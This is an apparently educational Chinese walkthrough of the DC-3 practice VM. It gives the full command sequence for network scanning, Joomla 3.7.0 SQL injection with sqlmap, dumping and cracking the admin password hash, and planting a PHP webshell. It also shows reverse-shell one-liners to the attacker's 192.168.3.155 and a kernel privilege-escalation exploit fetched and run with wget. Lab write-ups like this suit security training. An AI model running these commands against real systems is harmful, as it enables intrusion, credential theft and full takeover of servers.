目录

DC-3靶机渗透测试

一、实验环境

二、渗透过程演示

1、信息搜集

2、SQL注入

3、登录后台

4、反弹shell

5、提权

总结：

DC-3靶机渗透测试

DC-3也是一个黑盒测试，我们所能知道的只有它的MAC地址，我们可以根据它的MAC地址来确定IP地址

一、实验环境

实验环境：

kali：192.168.3.155/24（桥接到vmnet0）

靶机环境DC-3（桥接到vmnet0，MAC地址：00:0C:29:2C:47:A4）

保证kali和DC-3在同一个网段

二、渗透过程演示

1、信息搜集

①搜集IP和端口

利用nmap或者是netdiscover

使用命令：netdiscover或者 netdiscover -r 192.168.3.0/24或者nmap -sP 192.168.3.1/24 -o nmap.sP，得知DC-3的IP地址为192.168.3.159

接下来对DC-3做端口扫描

nmap -A 192.168.3.159 -p 1-65535 -oN nmap.A 发现仅开放了80端口

访问192.168.3.159这个网页，如下图所示

我们发现好像不太能够确定网站究竟使用的是什么，我们对网站做指纹识别，做指纹识别的时候我们用whatweb命令。

whatweb -h查看命令用法

网站指纹识别工具Whatweb的使用：

命令：whatweb http://192.168.3.159，发现是Joomla，开源的内容管理系统

国外三大开源的PHP CMS ：

1、drupal

2、wordpress site

3、joomla

发现是joomla,这个就可以使用网站针对这个cms的扫描器Joomscan，kali默认是没有安装的，需要自己手动安装

joomscan专门扫描joomla

②joomscan安装和使用

Joomscan安装

git clone /rezasp/joomscan.git

或者apt install joonscan（√）

使用方法

joomscan --url http://192.168.3.159

上面那些目录都是可以看的

得到joomla对应版本以及后台地址http://192.168.3.159/administrator/，看看能不能得到网站后台的账密，做爆破（这是绝招，不到万不得已不建议用）

2、SQL注入

③搜索关于joomla3.7.0有没有漏洞（exploitdb查找对应exp）

在kali自带的exploitdb中查找对应版本的joomla漏洞

searchsploit joomla 3.7.0 发现了有SQL注入漏洞

接下来把这个文件复制到当前路径下：cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomlav370_sqli.txt

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

执行前把地址改一下：localhost改为192.168.3.159

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

--dbs是列出当前服务器中的mysql数据库中都有哪些库名：

爆库名：--dbs

、

列出当前数据库的名字：--current-db

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

爆表：-D "joomladb" --tables

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

查询列、字段：-D "joomladb" -T "#__users" --columns

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

给个路径写1，线程写10

列目录（name，password）：-C指定字段 -C "name,password" --dump

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

name | password

+---------+--------------------------------------------------------------+

| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

使用John解密

著名密码破解利器Johnthe Ripper

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

将上述密文写到一个文件里面：vim joomla_v370_admin_hash.txt

john joomla_v370_admin_hash.txt 解出密码：snoopy

3、登录后台

admin | snoopy成功登陆后台

登录进后台，发现可以修改网页源代码

这个地方如果可以修改PHP文件的话，那就可以直接写一个PHP大马/小马，要找到路径，根据joomla网站特点，一般在/templates下

在template栏中发现可以写文件和上传文件。我们可以写一个小马上传上去

点击NewFile创建文件（yjh.php）

接下来打开蚁剑

右键查看虚拟终端：whoami

4、反弹shell

kali 本地监听

nc -lvvp 2333

蚁剑虚拟终端

nc -e /bin/bash 192.168.3.155 2333

-e 参数不可用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.155 2333 >/tmp/f

反弹成功！！！

5、提权

①信息收集

cat /proc/version查看版本

cat /etc/issue查看发行版信息

发现该靶机版本为Ubuntu 16.04

②在exploitdb中查找对应版本的joomla漏洞

输入如下命令查看该版本漏洞

searchsploit Ubuntu 16.04

使用39772.txt进行提权

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt

cat ubuntu1604_shell.txt

先把exp下载到kali镜像中

wget /offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在反弹shell 的界面测试，发现访问失败，原因是我们的电脑无法访问国外的服务器

解决方法：我们先将39772.zip 文件下载至本地，本地搭建服务器，将文件上传至服务器，

我们直接访问本地服务器下载文件即可

直接在靶机中下载容易失败。我们先下载到本地，在kali中搭建服务，并将exp压缩包上传上去

EXP资源

链接：/s/1AeuJrP-T6elka5aZP9KL9g

提取码：0fkw

将下载的压缩包放到/var/www/html/文件夹下

接下来只需要在shell中输入如下命令即可将exp下载到靶机(DC-3)中

wget http://192.168.3.155/39772.zip（192.168.3.155是kali的IP，把kali上的文件下载到DC3）

之后解压该文件

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

改个密码：

总结：

1、Joomscan可针对JoomlaCMS进行扫描

2、使用kali自带exploitdb库可查询kali收集的各种exp，命令为Searchsploit 程序名称 版本

3、使用John对hash值解密

4、bash反弹shell